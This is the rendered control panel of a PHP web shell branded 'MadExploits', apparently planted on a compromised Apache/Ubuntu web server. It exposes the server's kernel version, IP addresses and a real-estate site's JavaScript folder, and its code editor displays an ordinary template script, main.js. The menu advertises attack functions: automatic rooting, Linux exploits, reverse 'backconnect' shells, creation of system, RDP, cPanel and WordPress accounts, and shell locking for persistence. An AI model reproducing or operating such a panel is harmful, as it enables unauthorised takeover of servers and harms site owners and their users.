Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.63.181
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
realestate /
source /
public /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
config.js
800
B
-rwxr-xr-x
custom.js
3.1
KB
-rwxr-xr-x
dashboards-analytics.js
9.4
KB
-rwxr-xr-x
extended-ui-perfect-scrollbar....
1.06
KB
-rwxr-xr-x
form-basic-inputs.js
188
B
-rwxr-xr-x
main.js
5.28
KB
-rwxr-xr-x
pages-account-settings-account...
852
B
-rwxr-xr-x
ui-modals.js
1.04
KB
-rwxr-xr-x
ui-popover.js
443
B
-rwxr-xr-x
ui-toasts.js
1.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.js
/** * Main */ 'use strict'; let menu, animate; (function () { // Button & Pagination Waves effect if (typeof Waves !== 'undefined') { Waves.init(); Waves.attach( ".btn[class*='btn-']:not(.position-relative):not([class*='btn-outline-']):not([class*='btn-label-'])", ['waves-light'] ); Waves.attach("[class*='btn-outline-']:not(.position-relative)"); Waves.attach('.pagination .page-item .page-link'); Waves.attach('.dropdown-menu .dropdown-item'); Waves.attach('.light-style .list-group .list-group-item-action'); Waves.attach('.dark-style .list-group .list-group-item-action', ['waves-light']); Waves.attach('.nav-tabs:not(.nav-tabs-widget) .nav-item .nav-link'); Waves.attach('.nav-pills .nav-item .nav-link', ['waves-light']); Waves.attach('.menu-vertical .menu-item .menu-link.menu-toggle'); } // Window scroll function for navbar function onScroll() { var layoutPage = document.querySelector('.layout-page'); if (layoutPage) { if (window.pageYOffset > 0) { layoutPage.classList.add('window-scrolled'); } else { layoutPage.classList.remove('window-scrolled'); } } } // On load time out setTimeout(() => { onScroll(); }, 200); // On window scroll window.onscroll = function () { onScroll(); }; // Initialize menu //----------------- let layoutMenuEl = document.querySelectorAll('#layout-menu'); layoutMenuEl.forEach(function (element) { menu = new Menu(element, { orientation: 'vertical', closeChildren: false }); // Change parameter to true if you want scroll animation window.Helpers.scrollToActive((animate = false)); window.Helpers.mainMenu = menu; }); // Initialize menu togglers and bind click on each let menuToggler = document.querySelectorAll('.layout-menu-toggle'); menuToggler.forEach(item => { item.addEventListener('click', event => { event.preventDefault(); window.Helpers.toggleCollapsed(); }); }); // Display menu toggle (layout-menu-toggle) on hover with delay let delay = function (elem, callback) { let timeout = null; elem.onmouseenter = function () { // Set timeout to be a timer which will invoke callback after 300ms (not for small screen) if (!Helpers.isSmallScreen()) { timeout = setTimeout(callback, 300); } else { timeout = setTimeout(callback, 0); } }; elem.onmouseleave = function () { // Clear any timers set to timeout document.querySelector('.layout-menu-toggle').classList.remove('d-block'); clearTimeout(timeout); }; }; if (document.getElementById('layout-menu')) { delay(document.getElementById('layout-menu'), function () { // not for small screen if (!Helpers.isSmallScreen()) { document.querySelector('.layout-menu-toggle').classList.add('d-block'); } }); } // Display in main menu when menu scrolls let menuInnerContainer = document.getElementsByClassName('menu-inner'), menuInnerShadow = document.getElementsByClassName('menu-inner-shadow')[0]; if (menuInnerContainer.length > 0 && menuInnerShadow) { menuInnerContainer[0].addEventListener('ps-scroll-y', function () { if (this.querySelector('.ps__thumb-y').offsetTop) { menuInnerShadow.style.display = 'block'; } else { menuInnerShadow.style.display = 'none'; } }); } // Init helpers & misc // -------------------- // Init BS Tooltip const tooltipTriggerList = [].slice.call(document.querySelectorAll('[data-bs-toggle="tooltip"]')); tooltipTriggerList.map(function (tooltipTriggerEl) { return new bootstrap.Tooltip(tooltipTriggerEl); }); // Accordion active class and previous-active class const accordionActiveFunction = function (e) { if (e.type == 'show.bs.collapse' || e.type == 'show.bs.collapse') { e.target.closest('.accordion-item').classList.add('active'); e.target.closest('.accordion-item').previousElementSibling?.classList.add('previous-active'); } else { e.target.closest('.accordion-item').classList.remove('active'); e.target.closest('.accordion-item').previousElementSibling?.classList.remove('previous-active'); } }; const accordionTriggerList = [].slice.call(document.querySelectorAll('.accordion')); const accordionList = accordionTriggerList.map(function (accordionTriggerEl) { accordionTriggerEl.addEventListener('show.bs.collapse', accordionActiveFunction); accordionTriggerEl.addEventListener('hide.bs.collapse', accordionActiveFunction); }); // Auto update layout based on screen size window.Helpers.setAutoUpdate(true); // Toggle Password Visibility window.Helpers.initPasswordToggle(); // Speech To Text window.Helpers.initSpeechToText(); // Nav tabs animation window.Helpers.navTabsAnimation(); // Manage menu expanded/collapsed with templateCustomizer & local storage //------------------------------------------------------------------ // If current layout is horizontal OR current window screen is small (overlay menu) than return from here if (window.Helpers.isSmallScreen()) { return; } // If current layout is vertical and current window screen is > small // Auto update menu collapsed/expanded based on the themeConfig window.Helpers.setCollapsed(true, false); })();
Close